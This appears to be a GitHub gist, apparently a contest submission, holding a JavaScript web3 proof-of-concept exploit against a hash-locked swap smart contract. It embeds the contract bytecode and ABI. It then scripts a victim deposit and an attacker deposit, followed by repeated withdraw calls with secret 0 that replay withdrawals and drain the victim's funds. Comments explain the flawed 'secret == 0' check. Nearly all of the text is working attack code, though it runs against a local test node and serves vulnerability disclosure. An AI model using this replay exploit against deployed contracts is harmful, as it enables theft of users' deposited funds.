Created
October 17, 2019 12:55
-
-
Save toukmanov/8290feb057776d2a4e612c4b59a7ca84 to your computer and use it in GitHub Desktop.
ton_contest_swap_exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const Web3 = require('web3'); | |
| const BYTECODE = { | |
| "linkReferences": {}, | |
| "object": "6080604052612a3060005534801561001657600080fd5b506108e3806100266000396000f3fe6080604052600436106100555760003560e01c80631da0b8fc1461005a57806399caf975146100bf578063b9e1aa0314610159578063f3fef3a3146101a7578063f8b2cb4f14610202578063fa89401a14610267575b600080fd5b34801561006657600080fd5b506100a96004803603602081101561007d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506102b8565b6040518082815260200191505060405180910390f35b3480156100cb57600080fd5b5061012e600480360360408110156100e257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610341565b6040518085815260200184815260200183815260200182815260200194505050505060405180910390f35b6101a56004803603604081101561016f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035906020019092919050505061037e565b005b3480156101b357600080fd5b50610200600480360360408110156101ca57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506104d7565b005b34801561020e57600080fd5b506102516004803603602081101561022557600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291905050506106cd565b6040518082815260200191505060405180910390f35b34801561027357600080fd5b506102b66004803603602081101561028a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610756565b005b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600101549050919050565b6001602052816000526040600020602052806000526040600020600091509150508060000154908060010154908060020154908060030154905084565b6000600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600301541461040a57600080fd5b60405180608001604052806000815260200182815260200142815260200134815250600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082015181600001556020820151816001015560408201518160020155606082015181600301559050505050565b6104df610883565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020604051806080016040529081600082015481526020016001820154815260200160028201548152602001600382015481525050905060008160000151146105a157600080fd5b60608260405160200180828152602001915050604051602081830303815290604052905081602001516002826040518082805190602001908083835b6020831061060057805182526020820191506020810190506020830392506105dd565b6001836020036101000a038019825116818451168082178552505050505050905001915050602060405180830381855afa158015610642573d6000803e3d6000fd5b5050506040513d602081101561065757600080fd5b81019080805190602001909291905050501461067257600080fd5b828260000181815250503373ffffffffffffffffffffffffffffffffffffffff166108fc83606001519081150290604051600060405180830381858888f193505050501580156106c6573d6000803e3d6000fd5b5050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600301549050919050565b61075e610883565b600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206040518060800160405290816000820154815260200160018201548152602001600282015481526020016003820154815250509050600081606001511161082057600080fd5b426000548260400151011061083457600080fd5b3373ffffffffffffffffffffffffffffffffffffffff166108fc82606001519081150290604051600060405180830381858888f1935050505015801561087e573d6000803e3d6000fd5b505050565b604051806080016040528060008152602001600080191681526020016000815260200160008152509056fea265627a7a72315820c112e3b039e47e4d4d051ea5e0b25f5ec67fe8cdd74600d7327932e6d7bddcde64736f6c634300050b0032", | |
| "opcodes": "PUSH1 0x80 PUSH1 0x40 MSTORE PUSH2 0x2A30 PUSH1 0x0 SSTORE CALLVALUE DUP1 ISZERO PUSH2 0x16 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST POP PUSH2 0x8E3 DUP1 PUSH2 0x26 PUSH1 0x0 CODECOPY PUSH1 0x0 RETURN INVALID PUSH1 0x80 PUSH1 0x40 MSTORE PUSH1 0x4 CALLDATASIZE LT PUSH2 0x55 JUMPI PUSH1 0x0 CALLDATALOAD PUSH1 0xE0 SHR DUP1 PUSH4 0x1DA0B8FC EQ PUSH2 0x5A JUMPI DUP1 PUSH4 0x99CAF975 EQ PUSH2 0xBF JUMPI DUP1 PUSH4 0xB9E1AA03 EQ PUSH2 0x159 JUMPI DUP1 PUSH4 0xF3FEF3A3 EQ PUSH2 0x1A7 JUMPI DUP1 PUSH4 0xF8B2CB4F EQ PUSH2 0x202 JUMPI DUP1 PUSH4 0xFA89401A EQ PUSH2 0x267 JUMPI JUMPDEST PUSH1 0x0 DUP1 REVERT JUMPDEST CALLVALUE DUP1 ISZERO PUSH2 0x66 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST POP PUSH2 0xA9 PUSH1 0x4 DUP1 CALLDATASIZE SUB PUSH1 0x20 DUP2 LT ISZERO PUSH2 0x7D JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP2 ADD SWAP1 DUP1 DUP1 CALLDATALOAD PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 POP POP POP PUSH2 0x2B8 JUMP JUMPDEST PUSH1 0x40 MLOAD DUP1 DUP3 DUP2 MSTORE PUSH1 0x20 ADD SWAP2 POP POP PUSH1 0x40 MLOAD DUP1 SWAP2 SUB SWAP1 RETURN JUMPDEST CALLVALUE DUP1 ISZERO PUSH2 0xCB JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST POP PUSH2 0x12E PUSH1 0x4 DUP1 CALLDATASIZE SUB PUSH1 0x40 DUP2 LT ISZERO PUSH2 0xE2 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP2 ADD SWAP1 DUP1 DUP1 CALLDATALOAD PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 DUP1 CALLDATALOAD PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 POP POP POP PUSH2 0x341 JUMP JUMPDEST PUSH1 0x40 MLOAD DUP1 DUP6 DUP2 MSTORE PUSH1 0x20 ADD DUP5 DUP2 MSTORE PUSH1 0x20 ADD DUP4 DUP2 MSTORE PUSH1 0x20 ADD DUP3 DUP2 MSTORE PUSH1 0x20 ADD SWAP5 POP POP POP POP POP PUSH1 0x40 MLOAD DUP1 SWAP2 SUB SWAP1 RETURN JUMPDEST PUSH2 0x1A5 PUSH1 0x4 DUP1 CALLDATASIZE SUB PUSH1 0x40 DUP2 LT ISZERO PUSH2 0x16F JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP2 ADD SWAP1 DUP1 DUP1 CALLDATALOAD PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 DUP1 CALLDATALOAD SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 POP POP POP PUSH2 0x37E JUMP JUMPDEST STOP JUMPDEST CALLVALUE DUP1 ISZERO PUSH2 0x1B3 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST POP PUSH2 0x200 PUSH1 0x4 DUP1 CALLDATASIZE SUB PUSH1 0x40 DUP2 LT ISZERO PUSH2 0x1CA JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP2 ADD SWAP1 DUP1 DUP1 CALLDATALOAD PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 DUP1 CALLDATALOAD SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 POP POP POP PUSH2 0x4D7 JUMP JUMPDEST STOP JUMPDEST CALLVALUE DUP1 ISZERO PUSH2 0x20E JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST POP PUSH2 0x251 PUSH1 0x4 DUP1 CALLDATASIZE SUB PUSH1 0x20 DUP2 LT ISZERO PUSH2 0x225 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP2 ADD SWAP1 DUP1 DUP1 CALLDATALOAD PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 POP POP POP PUSH2 0x6CD JUMP JUMPDEST PUSH1 0x40 MLOAD DUP1 DUP3 DUP2 MSTORE PUSH1 0x20 ADD SWAP2 POP POP PUSH1 0x40 MLOAD DUP1 SWAP2 SUB SWAP1 RETURN JUMPDEST CALLVALUE DUP1 ISZERO PUSH2 0x273 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST POP PUSH2 0x2B6 PUSH1 0x4 DUP1 CALLDATASIZE SUB PUSH1 0x20 DUP2 LT ISZERO PUSH2 0x28A JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP2 ADD SWAP1 DUP1 DUP1 CALLDATALOAD PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 POP POP POP PUSH2 0x756 JUMP JUMPDEST STOP JUMPDEST PUSH1 0x0 PUSH1 0x1 PUSH1 0x0 DUP4 PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x0 CALLER PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x1 ADD SLOAD SWAP1 POP SWAP2 SWAP1 POP JUMP JUMPDEST PUSH1 0x1 PUSH1 0x20 MSTORE DUP2 PUSH1 0x0 MSTORE PUSH1 0x40 PUSH1 0x0 KECCAK256 PUSH1 0x20 MSTORE DUP1 PUSH1 0x0 MSTORE PUSH1 0x40 PUSH1 0x0 KECCAK256 PUSH1 0x0 SWAP2 POP SWAP2 POP POP DUP1 PUSH1 0x0 ADD SLOAD SWAP1 DUP1 PUSH1 0x1 ADD SLOAD SWAP1 DUP1 PUSH1 0x2 ADD SLOAD SWAP1 DUP1 PUSH1 0x3 ADD SLOAD SWAP1 POP DUP5 JUMP JUMPDEST PUSH1 0x0 PUSH1 0x1 PUSH1 0x0 CALLER PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x0 DUP5 PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x3 ADD SLOAD EQ PUSH2 0x40A JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST PUSH1 0x40 MLOAD DUP1 PUSH1 0x80 ADD PUSH1 0x40 MSTORE DUP1 PUSH1 0x0 DUP2 MSTORE PUSH1 0x20 ADD DUP3 DUP2 MSTORE PUSH1 0x20 ADD TIMESTAMP DUP2 MSTORE PUSH1 0x20 ADD CALLVALUE DUP2 MSTORE POP PUSH1 0x1 PUSH1 0x0 CALLER PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x0 DUP5 PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x0 DUP3 ADD MLOAD DUP2 PUSH1 0x0 ADD SSTORE PUSH1 0x20 DUP3 ADD MLOAD DUP2 PUSH1 0x1 ADD SSTORE PUSH1 0x40 DUP3 ADD MLOAD DUP2 PUSH1 0x2 ADD SSTORE PUSH1 0x60 DUP3 ADD MLOAD DUP2 PUSH1 0x3 ADD SSTORE SWAP1 POP POP POP POP JUMP JUMPDEST PUSH2 0x4DF PUSH2 0x883 JUMP JUMPDEST PUSH1 0x1 PUSH1 0x0 DUP5 PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x0 CALLER PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x40 MLOAD DUP1 PUSH1 0x80 ADD PUSH1 0x40 MSTORE SWAP1 DUP2 PUSH1 0x0 DUP3 ADD SLOAD DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x1 DUP3 ADD SLOAD DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x2 DUP3 ADD SLOAD DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x3 DUP3 ADD SLOAD DUP2 MSTORE POP POP SWAP1 POP PUSH1 0x0 DUP2 PUSH1 0x0 ADD MLOAD EQ PUSH2 0x5A1 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST PUSH1 0x60 DUP3 PUSH1 0x40 MLOAD PUSH1 0x20 ADD DUP1 DUP3 DUP2 MSTORE PUSH1 0x20 ADD SWAP2 POP POP PUSH1 0x40 MLOAD PUSH1 0x20 DUP2 DUP4 SUB SUB DUP2 MSTORE SWAP1 PUSH1 0x40 MSTORE SWAP1 POP DUP2 PUSH1 0x20 ADD MLOAD PUSH1 0x2 DUP3 PUSH1 0x40 MLOAD DUP1 DUP3 DUP1 MLOAD SWAP1 PUSH1 0x20 ADD SWAP1 DUP1 DUP4 DUP4 JUMPDEST PUSH1 0x20 DUP4 LT PUSH2 0x600 JUMPI DUP1 MLOAD DUP3 MSTORE PUSH1 0x20 DUP3 ADD SWAP2 POP PUSH1 0x20 DUP2 ADD SWAP1 POP PUSH1 0x20 DUP4 SUB SWAP3 POP PUSH2 0x5DD JUMP JUMPDEST PUSH1 0x1 DUP4 PUSH1 0x20 SUB PUSH2 0x100 EXP SUB DUP1 NOT DUP3 MLOAD AND DUP2 DUP5 MLOAD AND DUP1 DUP3 OR DUP6 MSTORE POP POP POP POP POP POP SWAP1 POP ADD SWAP2 POP POP PUSH1 0x20 PUSH1 0x40 MLOAD DUP1 DUP4 SUB DUP2 DUP6 GAS STATICCALL ISZERO DUP1 ISZERO PUSH2 0x642 JUMPI RETURNDATASIZE PUSH1 0x0 DUP1 RETURNDATACOPY RETURNDATASIZE PUSH1 0x0 REVERT JUMPDEST POP POP POP PUSH1 0x40 MLOAD RETURNDATASIZE PUSH1 0x20 DUP2 LT ISZERO PUSH2 0x657 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP2 ADD SWAP1 DUP1 DUP1 MLOAD SWAP1 PUSH1 0x20 ADD SWAP1 SWAP3 SWAP2 SWAP1 POP POP POP EQ PUSH2 0x672 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST DUP3 DUP3 PUSH1 0x0 ADD DUP2 DUP2 MSTORE POP POP CALLER PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH2 0x8FC DUP4 PUSH1 0x60 ADD MLOAD SWAP1 DUP2 ISZERO MUL SWAP1 PUSH1 0x40 MLOAD PUSH1 0x0 PUSH1 0x40 MLOAD DUP1 DUP4 SUB DUP2 DUP6 DUP9 DUP9 CALL SWAP4 POP POP POP POP ISZERO DUP1 ISZERO PUSH2 0x6C6 JUMPI RETURNDATASIZE PUSH1 0x0 DUP1 RETURNDATACOPY RETURNDATASIZE PUSH1 0x0 REVERT JUMPDEST POP POP POP POP POP JUMP JUMPDEST PUSH1 0x0 PUSH1 0x1 PUSH1 0x0 DUP4 PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x0 CALLER PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x3 ADD SLOAD SWAP1 POP SWAP2 SWAP1 POP JUMP JUMPDEST PUSH2 0x75E PUSH2 0x883 JUMP JUMPDEST PUSH1 0x1 PUSH1 0x0 CALLER PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x0 DUP4 PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND DUP2 MSTORE PUSH1 0x20 ADD SWAP1 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 KECCAK256 PUSH1 0x40 MLOAD DUP1 PUSH1 0x80 ADD PUSH1 0x40 MSTORE SWAP1 DUP2 PUSH1 0x0 DUP3 ADD SLOAD DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x1 DUP3 ADD SLOAD DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x2 DUP3 ADD SLOAD DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x3 DUP3 ADD SLOAD DUP2 MSTORE POP POP SWAP1 POP PUSH1 0x0 DUP2 PUSH1 0x60 ADD MLOAD GT PUSH2 0x820 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST TIMESTAMP PUSH1 0x0 SLOAD DUP3 PUSH1 0x40 ADD MLOAD ADD LT PUSH2 0x834 JUMPI PUSH1 0x0 DUP1 REVERT JUMPDEST CALLER PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF AND PUSH2 0x8FC DUP3 PUSH1 0x60 ADD MLOAD SWAP1 DUP2 ISZERO MUL SWAP1 PUSH1 0x40 MLOAD PUSH1 0x0 PUSH1 0x40 MLOAD DUP1 DUP4 SUB DUP2 DUP6 DUP9 DUP9 CALL SWAP4 POP POP POP POP ISZERO DUP1 ISZERO PUSH2 0x87E JUMPI RETURNDATASIZE PUSH1 0x0 DUP1 RETURNDATACOPY RETURNDATASIZE PUSH1 0x0 REVERT JUMPDEST POP POP POP JUMP JUMPDEST PUSH1 0x40 MLOAD DUP1 PUSH1 0x80 ADD PUSH1 0x40 MSTORE DUP1 PUSH1 0x0 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 DUP1 NOT AND DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 DUP2 MSTORE PUSH1 0x20 ADD PUSH1 0x0 DUP2 MSTORE POP SWAP1 JUMP INVALID LOG2 PUSH6 0x627A7A723158 KECCAK256 0xc1 SLT 0xe3 0xb0 CODECOPY 0xe4 PUSH31 0x4D4D051EA5E0B25F5EC67FE8CDD74600D7327932E6D7BDDCDE64736F6C6343 STOP SDIV SIGNEXTEND STOP ORIGIN ", | |
| "sourceMap": "25:1544:0:-;;;71:7;52:26;;367:60;8:9:-1;5:2;;;30:1;27;20:12;5:2;367:60:0;25:1544;;;;;;" | |
| }; | |
| const ABI = [ | |
| { | |
| "constant": true, | |
| "inputs": [ | |
| { | |
| "internalType": "address", | |
| "name": "creator", | |
| "type": "address" | |
| } | |
| ], | |
| "name": "getHash", | |
| "outputs": [ | |
| { | |
| "internalType": "bytes32", | |
| "name": "", | |
| "type": "bytes32" | |
| } | |
| ], | |
| "payable": false, | |
| "stateMutability": "view", | |
| "type": "function" | |
| }, | |
| { | |
| "constant": true, | |
| "inputs": [ | |
| { | |
| "internalType": "address", | |
| "name": "", | |
| "type": "address" | |
| }, | |
| { | |
| "internalType": "address", | |
| "name": "", | |
| "type": "address" | |
| } | |
| ], | |
| "name": "swaps", | |
| "outputs": [ | |
| { | |
| "internalType": "uint256", | |
| "name": "secret", | |
| "type": "uint256" | |
| }, | |
| { | |
| "internalType": "bytes32", | |
| "name": "secretHash", | |
| "type": "bytes32" | |
| }, | |
| { | |
| "internalType": "uint256", | |
| "name": "createdAt", | |
| "type": "uint256" | |
| }, | |
| { | |
| "internalType": "uint256", | |
| "name": "balance", | |
| "type": "uint256" | |
| } | |
| ], | |
| "payable": false, | |
| "stateMutability": "view", | |
| "type": "function" | |
| }, | |
| { | |
| "constant": false, | |
| "inputs": [ | |
| { | |
| "internalType": "address", | |
| "name": "recipient", | |
| "type": "address" | |
| }, | |
| { | |
| "internalType": "bytes32", | |
| "name": "_secretHash", | |
| "type": "bytes32" | |
| } | |
| ], | |
| "name": "deposit", | |
| "outputs": [], | |
| "payable": true, | |
| "stateMutability": "payable", | |
| "type": "function" | |
| }, | |
| { | |
| "constant": false, | |
| "inputs": [ | |
| { | |
| "internalType": "address", | |
| "name": "creator", | |
| "type": "address" | |
| }, | |
| { | |
| "internalType": "uint256", | |
| "name": "_secret", | |
| "type": "uint256" | |
| } | |
| ], | |
| "name": "withdraw", | |
| "outputs": [], | |
| "payable": false, | |
| "stateMutability": "nonpayable", | |
| "type": "function" | |
| }, | |
| { | |
| "constant": true, | |
| "inputs": [ | |
| { | |
| "internalType": "address", | |
| "name": "creator", | |
| "type": "address" | |
| } | |
| ], | |
| "name": "getBalance", | |
| "outputs": [ | |
| { | |
| "internalType": "uint256", | |
| "name": "", | |
| "type": "uint256" | |
| } | |
| ], | |
| "payable": false, | |
| "stateMutability": "view", | |
| "type": "function" | |
| }, | |
| { | |
| "constant": false, | |
| "inputs": [ | |
| { | |
| "internalType": "address", | |
| "name": "recipient", | |
| "type": "address" | |
| } | |
| ], | |
| "name": "refund", | |
| "outputs": [], | |
| "payable": false, | |
| "stateMutability": "nonpayable", | |
| "type": "function" | |
| }, | |
| { | |
| "inputs": [], | |
| "payable": false, | |
| "stateMutability": "nonpayable", | |
| "type": "constructor" | |
| } | |
| ]; | |
| // hash of 0 | |
| const HASH0 = '0x66687aadf862bd776c8fc18b8e9f8e20089714856ee233b3902a591d0d5f2925'; | |
| // hash of 1 | |
| const HASH1 = '0xec4916dd28fc4c10d78e287ca5d9cc51ee1ae73cbfde08c6b37324cbfaac8bc5'; | |
| async function main(nodeURL) { | |
| const web3 = new Web3(nodeURL); | |
| const accounts = await web3.eth.getAccounts(); | |
| const attacker = accounts[0]; | |
| const victim = accounts[1]; | |
| const victimRecipient = accounts[2]; | |
| const contract = new web3.eth.Contract(ABI); | |
| const swap = await contract.deploy({data: BYTECODE.object}).send({from: attacker, gas: 1000000}); | |
| console.log('deployed', swap.options.address); | |
| const victimDeposit = await swap.methods.deposit(victimRecipient, HASH1).send({from: victim, value: 2000}); | |
| console.log('victim send deposit with txhash', victimDeposit.transactionHash); | |
| const swapBalance = await web3.eth.getBalance(swap.options.address); | |
| console.log('contract balance', swapBalance); | |
| const attackerDeposit = await swap.methods.deposit(attacker, HASH0).send({from: attacker, value: 2000}); | |
| console.log('attacker send deposit with txhash', attackerDeposit.transactionHash); | |
| console.log('contract balance', await web3.eth.getBalance(swap.options.address)); | |
| const firstWithdraw = await swap.methods.withdraw(attacker, 0).send({from: attacker}); | |
| console.log('attacker withdraw their money in ', firstWithdraw.transactionHash); | |
| console.log('contract balance after withdrawal', await web3.eth.getBalance(swap.options.address)); | |
| // but because we check | |
| // require(swap.secret == 0); | |
| // at line 53 | |
| // with using secret = 0 | |
| // we can replay withdrawal till contract balance is less than our deposit | |
| const secondWithdraw = await swap.methods.withdraw(attacker, 0).send({from: attacker}); | |
| console.log('attacker withdraw shared money in ', secondWithdraw.transactionHash); | |
| console.log('contract balance is', await web3.eth.getBalance(swap.options.address)); | |
| // so victim lost their money | |
| // and attacker can replay attack till get all money | |
| process.exit() | |
| } | |
| console.log(process.argv); | |
| main((process.argv.length > 2)?process.argv[2]:'http://127.0.0.1:7545'); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment